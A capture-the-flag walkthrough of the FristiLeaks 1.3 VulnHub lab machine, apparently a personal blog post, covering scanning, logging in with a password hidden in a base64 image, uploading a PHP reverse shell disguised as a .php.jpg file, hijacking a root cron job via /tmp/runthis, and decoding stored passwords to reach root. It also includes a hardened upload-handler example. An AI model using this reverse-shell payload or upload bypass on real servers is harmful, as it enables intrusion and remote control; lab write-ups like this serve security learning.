VulnHub: FRISTILEAKS: 1.3

ratiros01
5 min read, Apr 1, 2021

https://www.vulnhub.com/entry/fristileaks-13,133/

1. Network discovery

nmap -sn 10.0.2.24/24

2. Port scan

nmap -Pn 10.0.2.12

There’s only port 80.

3. OS and service scan

nmap -A -p80 10.0.2.12

4. Vuln scan

nmap --script vuln -p80 10.0.2.12

5. Nikto scan

6. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.12/ -x php,txt,html,sh,cgi

7. Access HTTP site on port 80

View page source

Access robots.txt

Access /cola, /sisi, and /beer. All of them result in the same or a very similar page.

Viewing their page source didn't reveal anything.

Accessing /icons revealed not much.

Accessing /images revealed not much.

After googling, I found that sisi and fristi are also drinks.

Let’s try accessing /fristi

There's a login page.

Viewing the page source, there's a possible username, 'eezeepz'.

Scrolling down to the bottom, I found some comments indicating that a base64 string is present.

Decoding it with CyberChef did not give me a readable string, because the base64 decodes to a PNG image.

I have to use another tool to render it.

Now I have an image containing the string.

Try using both of them to log in.

Login successful.

8. Uploading file

I’ll upload the reverse shell script as shell.php

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.24/1234 0>&1'");
?>

Prepare listener

rlwrap nc -lvp 1234

Cannot upload shell.php because it’s not an image file.

Change shell.php to shell.jpg

mv shell.php shell.jpg

Upload it

Access the shell.

http://10.0.2.12/fristi/uploads/shell.jpg

Back to the listener, still no shell.

Change shell.php to shell.php.jpg

cp shell.php shell.php.jpg

Access it again and now I have the shell.
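The upload behaviour seen above (shell.jpg accepted but not executed, shell.php.jpg accepted and executed) is what you get when a handler checks only the trailing extension and a server maps PHP to any ".php" segment in a filename. As an added example, not code from the FristiLeaks VM, here is that weak check beside a hardened handler that decides by file content, assigns its own name and extension, and stores the file outside the web root (the function names and the $dir path are assumptions):

```php
<?php
// Added example, not the FristiLeaks application code. Contrasts a suffix-only
// check with a handler that validates content and discards the client filename.

// Weak: only the trailing extension is inspected, so "shell.php.jpg" passes.
// A server that runs PHP for any ".php" segment will then execute it.
function weakIsImage(string $name): bool {
    return (bool) preg_match('/\.(jpg|jpeg|png|gif)$/i', $name);
}

// Hardened: decide by content, pick the extension ourselves, never keep the
// original filename. $dir is assumed to be a directory outside the document
// root; files are served later through a read-only download handler.
function saveUpload(array $file, string $dir): ?string {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    // Both the MIME sniff and the image header parse must agree it is an image.
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);   // no execute bit, not world-readable
    return $name;
}
```

With this handler a filename such as shell.php.jpg is irrelevant, because the stored name is generated server-side and the directory is never served as PHP.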

9. Privilege escalation

Verify user

whoami

List username

cat /etc/passwd

Verify /etc/passwd permission

ls -la /etc/passwd

It belongs to root.

Verify /etc/shadow permission

ls -la /etc/shadow

It belongs to root.

Explore directories on the machine.

In /home, I can access only eezeepz.

There’s notes.txt in /home/eezeepz

Read it

cat notes.txt

From the notes, there are some programs stored in /home/admin.

I will create a runthis file in /tmp that uses /home/admin/chmod to change the permissions of /home/admin.

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
cd /tmp
ls -la

Wait for a while and access /home/admin

cd /home/admin
ls -la

Read cronjob.py

cat cronjob.py

It's the script that runs /tmp/runthis.

Read cryptedpass.txt and whoisyourgodnow.txt

cat cryptedpass.txt
cat whoisyourgodnow.txt

They look like encoded strings.

Read cryptpass.py. I think it’s an encoding script.

I copy the code and add a decode function that undoes each step of cryptpass.py in reverse order (un-reverse the string, apply rot13, then base64-decode):

import base64, codecs

def decodeString(s):
    # Inverse of cryptpass.py: undo the reversal, then rot13, then base64.
    base64string = codecs.decode(s[::-1], 'rot13')
    return base64.b64decode(base64string)

Decode the contents of cryptedpass.txt and whoisyourgodnow.txt.

Use them to log in, starting with fristigod.

su fristigod

Verify sudo

sudo -l

I can run this command as fristi.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
whoami

Now, I’m root.

cd /root
ls -la
cat fristileaks_secrets.txt
